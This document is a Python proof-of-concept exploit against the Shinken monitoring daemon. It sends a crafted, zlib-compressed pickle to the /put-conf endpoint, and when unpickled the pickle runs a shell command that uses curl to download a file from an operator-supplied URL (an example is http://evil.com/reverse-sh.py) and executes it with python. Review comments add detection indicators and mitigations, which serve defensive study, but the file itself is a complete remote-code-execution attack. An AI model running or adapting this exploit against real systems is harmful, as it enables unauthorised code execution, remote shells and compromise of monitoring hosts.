import requests, zlib
from urllib.parse import urlencode
# Protocol-0 (text) pickle stream used as the template for the request body.
# Opcode by opcode: `c` (GLOBAL) names shinken.webui.bottlewebui._load, `(` sets
# a mark, `S'...'` pushes one string argument, `t` builds the argument tuple,
# `R` (REDUCE) calls the global with that tuple, and `.` ends the stream.
# Unpickling it therefore calls _load('os:system("...")') in the receiving process.
# NOTE(review): _load is presumably the bundled bottle loader, which evaluates the
# text after ':' against the named module -- confirm against the Shinken source.
# The `{}` placeholder is filled by str.format in get_payload(); the resulting
# shell command downloads that URL to /tmp/payload and runs it with python.
#
# Why this matters for defenders: the only global referenced lives inside the
# shinken package itself, so an unpickler that restricts globals by package name
# alone would still resolve it (NOTE(review): whether the target filters this way
# is not shown on this page). The durable fix is to not unpickle data received
# over the network at all. Host-side indicators taken from this string: a
# monitoring daemon spawning `curl` followed by `python /tmp/payload`, and the
# file /tmp/payload appearing on disk.
payload_drop = """cshinken.webui.bottlewebui
_load
(S'os:system("curl {}>/tmp/payload && python /tmp/payload")'
tR."""
def get_payload(payload_loc):
    """Return the pickle template with *payload_loc* filled in.

    The value is substituted verbatim into the single ``{}`` placeholder of
    ``payload_drop`` with ``str.format``; nothing is quoted or validated here.

    Args:
        payload_loc: URL text placed after ``curl`` in the embedded command.

    Returns:
        The completed protocol-0 pickle stream as ``str``.
    """
    rendered = payload_drop.format(payload_loc)
    return rendered
def shinken_poc(target, payload):
    """POST a zlib-compressed pickle to ``http://<target>/put-conf`` and print the reply.

    What the request looks like on the wire (useful for writing detections):
    plain HTTP, no credentials or tokens, ``Content-Type:
    application/x-www-form-urlencoded``, and a single form field ``conf`` whose
    value is the percent-encoded zlib stream of *payload*.

    NOTE(review): the receiving daemon presumably decompresses and unpickles the
    ``conf`` field; that is the behaviour this proof of concept relies on but it
    is not visible in this file. Mitigations follow from the request shape: keep
    the daemon port reachable only from trusted hosts, require authentication on
    the endpoint, and do not deserialize pickle from it.

    Args:
        target: ``host:port`` of the daemon, interpolated into the URL.
        payload: Pickle stream as ``bytes`` (``zlib.compress`` requires bytes).

    Returns:
        None. The HTTP status code and response body are printed to stdout.
        No timeout is passed to ``requests.post``, so the call can block.
    """
    form_body = urlencode({"conf": zlib.compress(payload)})
    response = requests.post(
        "http://{}/put-conf".format(target),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form_body,
    )
    print(response.status_code)
    print(response.text)
if __name__ == "__main__":
    # Interactive driver: both values come from the operator's terminal and are
    # used as typed. Intended for a lab instance the operator controls.
    server = input("shinken server address and port (e.g. 172.17.0.4:7771): ")
    location = input("payload location (e.g. http://evil.com/reverse-sh.py): ")
    pickle_text = get_payload(location)
    print("Sending payload to server http://{}/put-conf".format(server))
    # zlib.compress() in shinken_poc needs bytes, so encode the text pickle first.
    shinken_poc(server, pickle_text.encode("utf-8"))
    print("The end.")